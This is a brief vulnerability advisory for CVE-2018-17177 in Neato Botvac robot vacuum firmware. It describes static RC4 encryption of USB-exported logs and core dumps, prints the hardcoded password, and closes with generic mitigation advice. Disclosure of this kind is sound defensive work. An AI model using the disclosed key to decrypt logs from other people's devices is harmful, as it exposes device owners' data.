CVE-2018-17177

Name of the Vulnerable Software and Affected Versions Neato Botvac Connected version 2.2.0 Neato Botvac 85 version 1.2.1

Description An issue was discovered where static encryption is used for copying event logs and core dumps to a USB stick. These logs are RC4-encrypted with a 9-character password *^JEd4W!I that is obfuscated within a custom /bin/rc4 crypt binary.

Recommendations For Neato Botvac Connected version 2.2.0, consider disabling the use of static encryption for log copying until a secure method is implemented. For Neato Botvac 85 version 1.2.1, restrict access to the /bin/rc4 crypt binary to minimize the risk of exploitation. Avoid using the *^JEd4W!I password in any other security contexts to prevent potential abuse.